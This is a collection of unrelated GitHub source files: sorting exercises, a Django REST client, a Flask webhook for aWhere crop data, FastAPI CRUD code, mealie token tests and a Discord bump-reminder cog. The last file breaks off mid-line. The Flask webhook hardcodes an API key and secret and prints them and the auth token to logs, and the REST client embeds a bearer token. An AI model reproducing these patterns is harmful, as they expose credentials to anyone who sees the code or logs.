+{"seq_id":"12297901190","text":"#Python Program to Sort an array of elements using Bubble sort technique\n\nprint(\"\\nProgram To Sort an Array of Elements using Bubble Sort technique...\")\n\nsize = int(input(\"\\n Enter the size of array to store the elements you type:\"))\n\narr = list()\nprint (\"\\n Enter the elements of the array now :\")\n\nfor i in range(size):\n    n = input(\"Enter the Element :\")\n    arr.append(int(n))\n\nprint(\"\\n Sorting Begins now\")\nfor i in range(size):\n    for j in range(0, size-i-1):\n        if arr[j] > arr[j+1] :\n            arr[j], arr[j+1] = arr[j+1], arr[j]\n\nfor i in range(size):\n    print(\"\\n\")\n    print(\"%d\" %arr[i])\n","repo_name":"vvr3ddy/Python_basics","sub_path":"BubbleSort.py","file_name":"BubbleSort.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"42617197845","text":"import requests\nendpoint = \"http://localhost:8000/api/products/\"\n\nheaders = {'Authorization': 'Bearer 9dcd3b7044b1b47b057bb0f9f00fa8abd1ec2e05'}\n\ndata = {\n    \"title\": \"This field is done\",\n    \"price\": \"32.49\"\n}\n\nget_response = requests.post( endpoint, json = data, headers = headers )\nprint(get_response.json()) # returns json","repo_name":"burhanuddinbaig/Django-Rest-Framework-Course","sub_path":"pyClient/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
+{"seq_id":"43751659613","text":"\"\"\"Logger module\"\"\"\nimport logging\nfrom typing import List, Union\nfrom pathlib import Path\n\nbasehandler = logging.StreamHandler()\nformatter = logging.Formatter(fmt=\" %(name)s :: %(levelname)-8s :: %(message)s\")\nbasehandler.setFormatter(formatter)\n\n\nclass LoggerBase:\n    def __init__(self, **kwargs) -> None:\n        self.init_logging()\n\n    def init_logging(self) -> None:\n        self.logger: logging.Logger = logging.getLogger(self.__class__.__name__)\n        self.logger.addHandler(basehandler)\n        self._logging_filehandler: Union[None, logging.FileHandler] = None\n\n    def set_log_filehandler(self, filepath: Path) -> None:\n        fh = logging.FileHandler(str(filepath), \"a\")\n        fh.setFormatter(formatter)\n        self._logging_filehandler = fh\n        self.logger.addHandler(fh)\n\n    def __del__(self) -> None:\n        self.close_logger()\n\n    def close_logger(self) -> None:\n        handlers: List[logging.Handler] = self.logger.handlers\n        for handler in handlers:\n            handler.close()\n            self.logger.removeHandler(handler)\n","repo_name":"Reidmen/LostTraderBot","sub_path":"losttraderbot/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"}
+{"seq_id":"17958002820","text":"\"\"\"ML Dataset Container\"\"\"\nfrom typing import Optional\nimport os\nimport json\n\nclass MLdatasets:\n    \"\"\"ML Dataset Container Class\"\"\"\n    dsconfig_path:str = None\n    kaggle_enabled:bool = None\n    kaggle_json_path:str = None\n    kaggle_username:str = None\n    kaggle_key:str = None\n\n    def __init__(\n        self,\n        dsconfig_path:Optional[str] = './dsconfig.json',\n        kaggle_enabled:Optional[bool] = None,\n        kaggle_json_path:Optional[str] = None,\n        kaggle_username:Optional[str] = None,\n        kaggle_key:Optional[str] = None\n    ) -> None:\n\n        self.dsconfig_path = dsconfig_path\n        self.kaggle_enabled = False\n\n        if (kaggle_enabled is None) or (kaggle_enabled is True):\n            if kaggle_json_path is not None:\n                self.kaggle_json_path = kaggle_json_path\n                with open(kaggle_json_path, encoding=\"utf-8\") as file:\n                    kaggle_creds = json.load(file)\n                kaggle_username = kaggle_creds['username']\n                kaggle_key = kaggle_creds['key']\n            if kaggle_username is not None:\n                self.kaggle_username = kaggle_username\n            if kaggle_key is not None:\n                self.kaggle_key = kaggle_key\n            if self.kaggle_username is not None and self.kaggle_key is not None:\n                os.environ['KAGGLE_USERNAME'] = self.kaggle_username\n                os.environ['KAGGLE_KEY'] = self.kaggle_key\n            if 'KAGGLE_USERNAME' in os.environ and 'KAGGLE_KEY' in os.environ:\n                self.kaggle_enabled = True\n                #test_cmd = 'kaggle datasets list --sort-by votes'\n                #runcmd(test_cmd)\n                #os.environ['KAGGLE_USERNAME'] = self.kaggle_username\n                #os.environ['KAGGLE_KEY'] = self.kaggle_key\n        return None\n","repo_name":"smasis001/Machine-Learning-Datasets","sub_path":"machine_learning_datasets/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"9129570773","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom future import standard_library\nfrom future import standard_library\nstandard_library.install_aliases()\n\nfrom urllib.parse import urlparse, urlencode\nfrom urllib.request import urlopen, Request\nfrom urllib.error import HTTPError\n\nfrom builtins import str\nfrom builtins import bytes\nfrom builtins import object\n\nimport requests as rq\nimport base64\nimport pprint\nimport json\nimport os\nimport random\nimport sys\nimport datetime\nfrom datetime import date\n\nfrom flask import Flask\nfrom flask import request\nfrom flask import make_response\nfrom flask import render_template\n\n\n# Flask app should start in global layout\n\napp = Flask(__name__)\n\t\n@app.route('/hello')\ndef hello():\n    return render_template('index.html')\n\n@app.route('/webhook', 
methods=['POST'])\ndef webhook():\n req = request.get_json(silent=True, force=True)\n\n res = processRequest(req)\n res = json.dumps(res, indent=4)\n print(res)\n sys.stdout.flush()\n\n r = make_response(res)\n r.headers['Content-Type'] = 'application/json'\n return r\n\ndef processRequest(req):\n # Parsing the POST request body into a dictionary for easy access. \n req_dict = json.loads(request.data)\n \n parameters = req_dict[\"result\"][\"parameters\"]\n \n parameterDate = parameters[\"date\"][5:10]\n parameterCrop = parameters[\"crop\"]\n\n # checking for faults in parameters\n startDt = date(2018, 5, 1)\n endDt = date(2018, int(parameterDate[0:2]), int(parameterDate[3:5]))\n if startDt>endDt:\n speech = 'Growing season did not start yet!'\n elif not (parameterCrop == 'cotton' or parameterCrop == 'corn'):\n speech = 'Crop not supported yet!'\n\n # constructing the resposne string.\n else:\n speech = integrate(parameterDate, parameterCrop)\n res = makeWebhookResult(speech)\n return res\n\ndef makeWebhookResult(speech):\n print(\"Response:\")\n sys.stdout.flush()\n print(speech)\n sys.stdout.flush()\n\n return {\n \"speech\": speech,\n \"displayText\": speech,\n \"source\": \"Build conversational interface for your app in 10 minutes.\"\n }\n\n#FUNCTION TO CALL AWHERE\ndef integrate(date, crop):\n awhere = AWhereAPI(date, crop)\n return awhere.get_agronomic_url_today()\n\n#AWHERE\nclass AWhereAPI(object):\n def __init__(self, end_dt, crop):\n \"\"\"\n Initializes the AWhereAPI class, which is used to perform HTTP requests \n to the aWhere V2 API.\n elf. Docs:\n http://developer.awhere.com/api/reference\n \"\"\"\n \n self.THIS_DT = datetime.datetime.today().strftime('%m-%d')\n self.END_DT = end_dt\n self.START_DT = '05-01'\n self.START_YEAR = '2015'\n self.END_YEAR = '2018'\n self.THIS_YEAR = '2019'\n self.CROP = crop\n if self.CROP == 'cotton':\n self.FIELD = 'field4'\n elif self.CROP == 'corn':\n self.FIELD = 'field1'\n self.NUM_OF_DAYS = self.number_of_days()\n self._fields_url = 'https://api.awhere.com/v2/fields'\n self._weather_url = 'https://api.awhere.com/v2/weather/fields'\n self._agronomic_url = 'https://api.awhere.com/v2/agronomics/fields/' + self.FIELD + '/agronomicnorms/' + self.START_DT + ',' + self.END_DT + '/?limit=1&offset=' + self.NUM_OF_DAYS\n self._forecasts_url = 'https://api.awhere.com/v2/weather/fields/' + self.FIELD + '/forecasts/' + self.THIS_DT\n self.api_key = 'r4AGIfSxMlQNkUPxQGgLx7kpIKovQCMI'\n self.api_secret = 'S9nipeJJ6AVLmRdG'\n self.base_64_encoded_secret_key = self.encode_secret_and_key(self.api_key, self.api_secret)\n self.auth_token = self.get_oauth_token(self.base_64_encoded_secret_key)\n\n def number_of_days(self):\n startDate = date(2018, int(self.START_DT[0:2]), int(self.START_DT[3:5]))\n endDate = date(2018, int(self.END_DT[0:2]), int(self.END_DT[3:5]))\n numOfDays = endDate - startDate\n numOfDaysStr = str(numOfDays)[0:str(numOfDays).find(' ')+1]\n print('\\nnumber_of_days:: numOfDaysStr: %s' % numOfDaysStr)\n sys.stdout.flush()\n return numOfDaysStr\n\n def encode_secret_and_key(self, key, secret):\n \"\"\"\n Docs:\n http://developer.awhere.com/api/authentication\n Returns:\n Returns the base64-encoded {key}:{secret} combination, seperated by a colon.\n \"\"\"\n # Base64 Encode the Secret and Key\n key_secret = '%s:%s' % (key, secret)\n print('\\nKey and Secret before Base64 Encoding: %s' % key_secret)\n sys.stdout.flush()\n encoded_key_secret = base64.b64encode(bytes(key_secret,\n 'utf-8')).decode('ascii')\n print('Key and Secret after Base64 
Encoding: %s' % encoded_key_secret)\n        sys.stdout.flush()\n        return encoded_key_secret\n\n    def get_oauth_token(self, encoded_key_secret):\n        \"\"\"\n        Demonstrates how to make a HTTP POST request to obtain an OAuth Token\n        Docs: \n            http://developer.awhere.com/api/authentication\n        Returns: \n            The access token provided by the aWhere API\n        \"\"\"\n        auth_url = 'https://api.awhere.com/oauth/token'\n        auth_headers = {\n            \"Authorization\": \"Basic %s\" % encoded_key_secret,\n            'Content-Type': 'application/x-www-form-urlencoded'\n        }\n        body = \"grant_type=client_credentials\"\n        print('\\nget_oauth_token:: Headers: %s' % auth_headers)\n        sys.stdout.flush()\n        print('\\nget_oauth_token:: Body: %s' % body)\n        sys.stdout.flush()\n        response = rq.post(auth_url, headers=auth_headers, data=body)\n        # .json method is a requests lib method that decodes the response\n        responseJSON = response.json()\n        print('\\nget_oauth_token:: ResponseJSON: %s' % responseJSON)\n        sys.stdout.flush()\n        return responseJSON['access_token']\n\n    def get_agronomic_url_today(self):\n        \"\"\"\n        Performs a HTTP GET request to obtain Agronomic Norms\n        Docs: \n            1. Agronomic: https://developer.awhere.com/api/reference/agronomics/norms\n        \"\"\"\n        # Setup the HTTP request headers\n        auth_headers = {\n            \"Authorization\": \"Bearer %s\" % self.auth_token,\n        }\n        print('\\nget_agronomic_url_today:: Headers: %s' % auth_headers)\n        sys.stdout.flush()\n\t\n        # Perform the HTTP request to obtain the Agronomic Norms for the Field\n        response = rq.get(self._agronomic_url, headers=auth_headers)\n        responseJSON = response.json()\n        print('\\nget_agronomic_url_today:: ResponseJSON: %s' % responseJSON)\n        sys.stdout.flush()\n\t\n        todayDailyNorm = responseJSON[\"dailyNorms\"][0]\n        accGDD = todayDailyNorm[\"accumulatedGdd\"][\"average\"]\n        pet = todayDailyNorm[\"pet\"][\"average\"]\n        potentialRatio = todayDailyNorm[\"ppet\"][\"average\"]\n        precipitation = pet * potentialRatio\n        waterRequirements = float(\"{0:.2f}\".format(pet - precipitation))\n        print('\\nget_agronomic_url_today:: precipitation: %f' % precipitation)\n        sys.stdout.flush()\n        print('\\nget_agronomic_url_today:: waterRequirements: %f' % waterRequirements)\n        sys.stdout.flush()\n\t\n        response2 = rq.get(self._forecasts_url, headers=auth_headers)\n        response2JSON = response2.json()\n        print('\\nget_agronomic_url_today:: Response2JSON: %s' % response2JSON)\n\t\n        forecast = response2JSON['forecast']\n        condition = forecast[0]['conditionsText']\n        if condition.find('No Rain') >= 0:\n            rainy = False\n        else:\n            rainy = True\n\t\n        #if crop is cotton\n        if self.CROP == 'cotton':\n            if accGDD>=0 and accGDD <28:\n                resultGrowthStage = 'planted'\n            elif accGDD >= 28 and accGDD < 306:\n                resultGrowthStage = \"emergence\"\n            elif accGDD >= 306 and accGDD < 528:\n                resultGrowthStage = \"first-square\"\n            elif accGDD >= 528 and accGDD < 1194:\n                resultGrowthStage = \"first-flower\"\n            elif accGDD >= 1194 and accGDD < 1444:\n                resultGrowthStage = \"open-bolli\"\n            elif accGDD >= 1444:\n                resultGrowthStage = \"harvest\"\n\n        #if crop is corn\n        if self.CROP == 'corn':\n            if accGDD>=0 and accGDD <65:\n                resultGrowthStage = 'planted'\n            elif accGDD >= 65 and accGDD < 740:\n                resultGrowthStage = \"emergence\"\n            elif accGDD >= 740 and accGDD < 1135:\n                resultGrowthStage = \"rapid growth\"\n            elif accGDD >= 1135 and accGDD < 1160:\n                resultGrowthStage = \"pollination\"\n            elif accGDD >= 1160 and accGDD < 1660:\n                resultGrowthStage = \"grain fill\"\n            elif accGDD >= 1660:\n                resultGrowthStage = \"harvest\"\n\n        if (potentialRatio < 1) & (not rainy):\n            return 'Today\\'s date is ' + self.END_DT 
+ '. Your water requirements for your ' + self.CROP + ' crops are: ' + str(waterRequirements) + ' mm. Your crops\\' growth stage is ' + resultGrowthStage + '.'\n else:\n return 'Today\\'s date is ' + self.END_DT + '. Your ' + self.FIELD + ' crops\\' growth stage is ' + resultGrowthStage + '. Do not water your crops.'\n\nif __name__ == '__main__':\n port = int(os.getenv('PORT', 5000))\n\n print(\"Starting app on port %d\" % port)\n\n app.run(debug=True, port=port, host='0.0.0.0', threaded=True)\n","repo_name":"yuvanshu/GDDandPET","sub_path":"app-awhere.py","file_name":"app-awhere.py","file_ext":"py","file_size_in_byte":9583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74509097763","text":"from collections import deque\n\n\ndef solution(new_id):\n answer = ''\n answer1 = ''\n answer2 = ''\n answer3 = ''\n new_id = list(new_id)\n # 첫번째조건 대문자 -> 소문자\n for i in range(len(new_id)):\n x = ord(new_id[i])\n if 65 <= x <= 90:\n answer += chr(x + 32)\n elif x == 45 or x == 46 or x == 95 or 97 <= x <= 122:\n answer += new_id[i]\n\n elif 48 <= x <= 57:\n answer += new_id[i]\n\n answer = list(answer)\n flag = 0\n for i in range(len(answer)):\n if answer[i] == '.':\n if flag:\n continue\n else:\n answer1 += answer[i]\n flag = 1\n else:\n answer1 += answer[i]\n flag = 0\n\n if len(answer1) > 2 and answer[0] == '.' and answer[-1] == '.':\n answer1 = answer1[1:-1]\n elif answer[0] == '.':\n answer1 = answer1[1:]\n elif answer[-1] == '.':\n answer1 = answer1[:-1]\n elif len(answer1) == 1 and answer1[0] == '.':\n answer1 = ''\n\n print(\"answer1\", answer1)\n\n if len(answer1) == 0:\n answer1 = 'a'\n\n if len(answer1) >= 16:\n for i in range(16):\n answer2 = answer1[:15]\n\n elif len(answer1) <= 2:\n answer2 += answer1\n for i in range(3 - len(answer1)):\n answer2 += answer1[-1]\n else:\n answer2 = answer1\n\n if len(answer2) > 2 and answer2[-1] == '.':\n answer2 = answer2[:-1]\n\n print(\"answer2\", answer2)\n return answer2","repo_name":"young0264/hellopycharm","sub_path":"프로그래머스/신규아이디추천.py","file_name":"신규아이디추천.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"192917244","text":"import json\n\nfrom fastapi.testclient import TestClient\nfrom pytest import fixture\n\nfrom tests.utils import api_routes\n\n\n@fixture\ndef long_live_token(api_client: TestClient, admin_token):\n response = api_client.post(api_routes.users_api_tokens, json={\"name\": \"Test Fixture Token\"}, headers=admin_token)\n assert response.status_code == 201\n\n return {\"Authorization\": f\"Bearer {json.loads(response.text).get('token')}\"}\n\n\ndef test_api_token_creation(api_client: TestClient, admin_token):\n response = api_client.post(api_routes.users_api_tokens, json={\"name\": \"Test API Token\"}, headers=admin_token)\n assert response.status_code == 201\n\n\ndef test_use_token(api_client: TestClient, long_live_token):\n response = api_client.get(api_routes.users, headers=long_live_token)\n\n assert response.status_code == 200\n\n\ndef test_delete_token(api_client: TestClient, admin_token):\n response = api_client.delete(api_routes.users_api_tokens_token_id(1), headers=admin_token)\n assert response.status_code == 200\n\n response = api_client.delete(api_routes.users_api_tokens_token_id(2), headers=admin_token)\n assert response.status_code == 
200\n","repo_name":"mealie-recipes/mealie","sub_path":"tests/integration_tests/user_tests/test_user_api_token.py","file_name":"test_user_api_token.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":3977,"dataset":"github-code","pt":"52"}
+{"seq_id":"28983586427","text":"from sqlalchemy.orm import Session\nfrom sqlalchemy import String\n\nfrom . import models, schemas\n\n\ndef get_user(db: Session, user_id: int):\n    return db.query(models.User).filter(models.User.id == user_id).first()\n\n\ndef get_user_by_email(db: Session, email: str):\n    return db.query(models.User).filter(models.User.email == email).first()\n\n\ndef get_users(db: Session, skip: int = 0, limit: int = 100):\n    return db.query(models.User).offset(skip).limit(limit).all()\n\n\ndef create_user(db: Session, user: schemas.UserCreate):\n    #fake_hashed_password = user.password + \"notreallyhashed\"\n    db_user = models.User(email=user.email, first_name=user.first_name,\n                          last_name=user.last_name, gender=user.gender)\n    db.add(db_user)\n    db.commit()\n    db.refresh(db_user)\n    return db_user\n\n\ndef create_items(db: Session, itemName: str):\n    db_items = models.Item(produto=itemName)\n    db.add(db_items)\n    db.commit()\n    db.refresh(db_items)\n    return db_items\n\n\ndef get_item(db: Session, item_id: int):\n    item = db.query(models.Item).filter(models.Item.id == item_id).first()\n    return item\n\n\ndef get_items(db: Session, skip: int = 0, limit: int = 100):\n    item = db.query(models.Item).offset(skip).limit(limit).all()\n    return item\n\n\ndef create_user_item(db: Session, item_id: int, user_id: int, quantidade: int):\n    user = get_user(db, user_id)\n    if(not user):\n        return \"Usario nao encontrado\"\n    item = get_item(db, item_id)\n    if(not item):\n        return \"Produto nao encontrado\"\n    db_item = models.User_Item(\n        produto_id=item_id, owner_id=user_id, quantidade=quantidade)\n    db.add(db_item)\n    db.commit()\n    db.refresh(db_item)\n    return db_item\n\n\ndef get_carrinho_per_user(db: Session, user_id: int):\n\n    if db.query(models.User_Item).filter(models.User_Item.owner_id == user_id).first() == None:\n        return \"Nenhum carrinho com este id\"\n    else:\n        carrinho = db.query(models.User_Item).filter(models.User_Item.owner_id == user_id).all()\n        if not carrinho:\n            return \"Carrinho esta vazio\"\n        else: \n            return carrinho\n\n\ndef delete_item_carrinho(db: Session, user_id: int, product_id: int):\n\n    usuario = db.query(models.User).filter(models.User.id == user_id).first()\n\n    prod = db.query(models.Item).filter(models.Item.id == product_id).first()\n\n    # print(\"Entrou\")\n\n    if usuario == None:\n        return \"Nenhum usuário com este id\"\n\n    elif prod == None:\n        return \"Nenhum produto com este id\"\n\n    else:\n        linhaUsuarioItem = db.query(models.User_Item).filter(\n            models.User_Item.produto_id == product_id, models.User_Item.owner_id == user_id).first()\n\n        db.delete(linhaUsuarioItem)\n        db.commit()\n\n        return \"Deletado com sucesso\"\n\ndef delete_item(db: Session, product_id: int):\n\n    prod = db.query(models.Item).filter(models.Item.id == product_id).first()\n\n    # print(\"Entrou\")\n\n    if prod == None:\n        return \"Nenhum produto com este id\"\n\n    else:\n        linhaUsuarioItem = db.query(models.User_Item).filter(models.User_Item.produto_id == product_id).all()\n        print(linhaUsuarioItem)\n        for i in linhaUsuarioItem:\n            db.delete(i)\n            db.commit()\n        db.delete(prod)\n        db.commit()\n        return \"Deletado com 
sucesso\"\n","repo_name":"TheoBR00/Projeto_final_cloud","sub_path":"Projeto_cloud/app/sql_app2/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39851708467","text":"import asyncio\nimport datetime\nimport logging\nimport traceback\nimport discord\n\nfrom discord.ext import commands, tasks\nfrom Extensions.Statistics import log_event\n\nfrom Globals.GlobalVariables import bot, on_log\nfrom Extensions.Settings import fetch_setting\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nlogger.addFilter(on_log)\n\ndef setup(bot):\n bot.add_cog(BumpReminder())\n\nclass BumpReminder(commands.Cog, name='Bump Reminder'):\n\n def __init__(self):\n self.bump_reminder_tasks = {}\n self.bump_reminder_starter.start()\n\n #Run on bot startup\n async def bump_task_start(self, guild):\n\n #Find last \"bump success\" message\n def bump_message_check(message):\n return (message.author.id == 302050872383242240 and hasattr(message, 'embeds') and \"Bump done!\" in message.embeds[0].description)\n\n def bump_remind_check(message):\n return (message.author.id == bot.user.id and hasattr(message, 'embeds') and \"Bump the server\" in message.embeds[0].description)\n\n bump_message = await self.get_message(guild, bump_message_check)\n\n if bump_message == None:\n logger.info(\"Bump message was empty, reminding now\")\n bot.loop.create_task(self.bump_reminder_task(0, guild.id))\n return\n\n time_since_bump = datetime.datetime.now(datetime.timezone.utc) - bump_message.created_at\n logger.info(f\"Time since bump is {time_since_bump}\")\n\n time_until_bump = datetime.timedelta(hours= 2) - time_since_bump\n\n bump_remind_message = await self.get_message(guild, bump_remind_check)\n\n if bump_remind_message is None:\n time_since_bump_remind = -1\n else:\n time_since_bump_remind = datetime.datetime.now(datetime.timezone.utc) - bump_remind_message.created_at\n\n if bump_remind_message != None and (bump_remind_message.created_at - bump_message.created_at).total_seconds() > 0 and not time_since_bump_remind.total_seconds() > 7200: \n logger.info(f\"Cancelling remind task and waiting because reminder was sent after last bump success and within two hours\")\n self.bump_reminder_tasks[guild.id] = False\n return\n\n #Start async task waiting for time until next bump\n bot.loop.create_task(self.bump_reminder_task(time_until_bump.total_seconds(), guild.id))\n self.bump_reminder_tasks[guild.id] = True\n\n\n async def get_message(self, guild, search):\n\n #Get channel\n channel = await bot.fetch_channel(fetch_setting(guild.id, 'bump_channel'))\n\n try: \n message = await channel.history(limit=50).find(search)\n \n if message == None:\n message = await channel.history(limit=150).find(search)\n\n if message == None:\n message = await channel.history(limit=1500).find(search)\n\n if message == None:\n logger.info(f'Could not find bump message within 1500 messages for {guild.name}/{channel.name}')\n except Exception as e:\n message = None\n logger.error(f'Failed to get bump message for {guild.name}/{channel.name}', exc_info=True)\n\n return message\n\n #Make bump message\n def get_reminder_embed(self):\n embed = discord.Embed(title= \"⋅•⋅⊰∙∘☽ Its bump time! 
☾∘∙⊱⋅•⋅\", description= \"Bump the server with `/bump`!\", color= 7528669)\n embed.set_thumbnail(url=bot.user.avatar.url)\n return embed\n\n #Async tasks\n async def bump_reminder_task(self, waitTime, guild_id):\n if waitTime < 0: waitTime = 0\n await asyncio.sleep(waitTime) #Sleep for waitTime seconds\n #...zzz...\n bump_channel_id = fetch_setting(guild_id, 'bump_channel')\n bump_role_id = fetch_setting(guild_id, 'bump_role')\n channel = await bot.fetch_channel(bump_channel_id) #Get channel\n await channel.send(embed= self.get_reminder_embed(), content= f\"<@&{bump_role_id}>\" if bump_role_id is not None else '') #Send reminder\n log_event('bump_reminded', modes=['global', 'guild'], id=guild_id)\n self.bump_reminder_tasks[guild_id] = False #Set task running to False\n\n @tasks.loop(minutes=15)\n async def bump_reminder_starter(self):\n try:\n async for guild in bot.fetch_guilds():\n if fetch_setting(guild.id, 'bump_channel') is None: continue\n if guild.id not in self.bump_reminder_tasks.keys(): self.bump_reminder_tasks[guild.id] = False\n if not self.bump_reminder_tasks[guild.id]:\n try:\n await self.bump_task_start(guild) #Start new task\n logger.info(f\"Bump reminder task started for guild {guild.name}\")\n except discord.errors.Forbidden:\n pass\n except Exception as e:\n logger.error(f'Reminder task failed to start for {guild.name}', exc_info=True) #If something goes wrong, just wait and try restarting again later\n except Exception as e:\n logger.error(f'Reminder task starter has failed. Trying again in 15 minutes', exc_info=True) #If something goes wrong, just wait and try restarting again later\n\n @bump_reminder_starter.before_loop\n async def before_bump(self):\n logger.info('Starting bump loop...')\n await bot.wait_until_ready()\n","repo_name":"SuperSmay/Elliot","sub_path":"Extensions/BumpReminder.py","file_name":"BumpReminder.py","file_ext":"py","file_size_in_byte":5432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34894544100","text":"import pprint\nimport htmlparser\nimport filegenerator\nimport userinput\nimport main\nimport dbhandler\nimport structures\n\n####################################################################################################\n# htmlparser.py tests\n####################################################################################################\n\ndef test_find_all_classes(html_filename):\n ## Test with class\n print(\"\\n#####################################################################################\")\n print(\"Test to find all classes in a .html file\")\n html_string = filegenerator.file_to_string(html_filename)\n\n test = htmlparser.get_class_names(html_string)\n print(test)\n return None\n\n####################################################################################################\n\ndef test_find_all_tags(html_filename):\n ## Test with tags\n print(\"\\n#####################################################################################\")\n print(\"Test to find all tags in a .html file\")\n html_string = filegenerator.file_to_string(html_filename)\n \n test = htmlparser.get_tag_names(html_string)\n print(test)\n return None\n\n\n####################################################################################################\n\ndef test_extract_tags_classes_exact(file, tag, class_):\n print(\"\\n#####################################################################################\")\n print(\"Testing exact tag and class extraction\")\n print(\"\\n1. 
Both tag and class:\")\n htmlparser.extract_tags_classes_exact(file, tag, class_)\n \n print(\"\\n2. Tag but no class:\")\n htmlparser.extract_tags_classes_exact(file, tag, \"\")\n\n print(\"\\n3. Class but no tag:\")\n htmlparser.extract_tags_classes_exact(file, \"\", class_)\n\n print(\"\\n4. No tag and no class:\")\n htmlparser.extract_tags_classes_exact(file, \"\", \"\") \n\n return None\n\n####################################################################################################\n\ndef test_extract_tags_classes_approximate(file, tag, class_): \n print(\"\\n#####################################################################################\")\n print(\"Testing approximate tag and class extraction\")\n print(\"\\n1. Both tag and class:\")\n htmlparser.extract_tags_classes_approximate(file, tag, class_)\n \n print(\"\\n2. Tag but no class:\")\n htmlparser.extract_tags_classes_approximate(file, tag, \"\")\n\n print(\"\\n3. Class but no tag:\")\n htmlparser.extract_tags_classes_approximate(file, \"\", class_)\n\n print(\"\\n4. No tag and no class:\")\n htmlparser.extract_tags_classes_approximate(file, \"\", \"\") \n\n return None\n\n\n####################################################################################################\n# main.py tests\n####################################################################################################\n\n# Possible user inputs\nSOURCETYPE_INPUTS = (#(\"file\" , \"alice.html\"),\n (\"folder\" , r\"C:\\Temp\"),\n #(\"website\" , \"\"),\n #(\"database\", \"\")\n )\nSEARCHTYPE_INPUTS = (\"Exact\",\n #\"Approximate\",\n #\"All\",\n #\"List\"\n )\nTAG_INPUTS = (#(\"\",),\n #(\"title\",),\n (\"p\",),\n #(\"a\",),\n #(\"title\", \"head\")\n )\nCLASS__INPUTS = ((\"\",),\n #(\"story\",),\n #(\"tory\",),\n #(\"story\", \"tory\"),\n )\nOUTPUTTYPE_INPUTS = (#(\".html report\", \"output\"),\n (\"abridged\", \"output\"),\n #(\".pdf\", \"output\"),\n #(\"current.sqlite\", \"output.sqlite\"),\n #(\"fresh.sqlite\", \"output\"),\n )\n\n# Simulated user input through the generation of several dictionaries\ndef user_input_simulation (sourcetypes,\n searchtypes,\n tags ,\n classes ,\n outputtypes,\n ):\n \"\"\"\n Input: Tuples with possible inputs by the user.\n Output: List with dictionaries representing possible user input.\n \"\"\"\n output_list = []\n \n for sourcetype in sourcetypes:\n for tag in tags:\n for class_ in classes:\n for searchtype in searchtypes:\n for outputtype in outputtypes:\n if searchtype == \"All\" and (class_ != (\"\",) or tag != (\"\",)): \n True # Exclude incongruent choice\n elif searchtype != \"All\" and (tag == (\"\",) and class_ == (\"\",)):\n True # Exclude incongruent choice\n else:\n output_list.append({\"sourcetype\": sourcetype,\n \"tag\" : tag,\n \"class_\" : class_,\n \"searchtype\": searchtype,\n \"outputtype\": outputtype\n })\n \n print(\"Generated {0} possible user inputs\".format(len(output_list)))\n\n return output_list\n\n####################################################################################################\n\ndef test_main():\n \"\"\"\n Uses simulated input to create multiple search patterns\n \"\"\"\n print(\"\\n#####################################################################################\")\n print(\"Testing valid user search requests\")\n test = user_input_simulation(SOURCETYPE_INPUTS,\n SEARCHTYPE_INPUTS,\n TAG_INPUTS,\n CLASS__INPUTS,\n OUTPUTTYPE_INPUTS,\n )\n for condition in test: print(condition)\n \n for condition in test:\n index = test.index(condition) + 1\n 
print(\"\\n\\nTest\", index, \"/\", len(test), condition)\n result = main.main(condition)\n print(type(result), len(result))\n pprint.pprint(result)\n return None\n \n\n####################################################################################################\n# filegenerator.py tests\n####################################################################################################\n\nTEXT = \"sampletest.txt\"\nCLASSES = \"classlist.txt\"\nTAGS = \"taglist.txt\"\n\ndef test_filegenerator():\n print(\"\"\"\n TEXT = \"sampletest.txt\"\n CLASSES = \"classlist.txt\"\n TAGS = \"taglist.txt\"\n \"\"\")\n test = filegenerator.txt_to_list(CLASSES)\n print(type(test))\n test = filegenerator.txt_to_list(TAGS)\n print(type(test))\n\n return None\n\n####################################################################################################\n# userinput.py tests\n####################################################################################################\n\ndef test_userinput():\n pprint.pprint(userinput.choose_primary_mode())\n\n\n####################################################################################################\n# dbhandler.py tests\n####################################################################################################\n\nMY_DICT = {\"001\": {\"Name\": \"Ann\" , \"Age\": 0, \"Russian\": True },\n \"002\": {\"Name\": \"Maya\" , \"Age\": 86, \"Russian\": False},\n \"003\": {\"Name\": \"John\" , \"Age\": 90, \"Russian\": False},\n \"004\": {\"Name\": \"Nadia\" , \"Age\": 87, \"Russian\": True },\n \"005\": {\"Name\": \"Russell\", \"Age\": 77, \"Russian\": False},\n \"006\": {\"Name\": \"Hiroko\" , \"Age\": 60, \"Russian\": False},\n \"007\": {\"Name\": \"Arkady\" , \"Age\": 71, \"Russian\": True },\n }\nMY_DICTALT = {\"001\": {\"Name\": \"Ann\" , \"Age\": 88, \"Russian\": True },\n \"002\": {\"Name\": \"Maya\" , \"Age\": 86, \"Russian\": False},\n \"003\": {\"Name\": \"John\" , \"Age\": 90, \"Russian\": False},\n \"004\": {\"Name\": \"Nadia\" , \"Age\": 87, \"Russian\": True },\n \"005\": {\"Name\": \"Russell\", \"Age\": 77, \"Russian\": False},\n \"006\": {\"Name\": \"Hiroko\" , \"Age\": 60, \"Russian\": False},\n \"008\": {\"Name\": \"Kasei\" , \"Age\": 25, \"Russian\": False},\n }\nMY_SQLFILENAME = 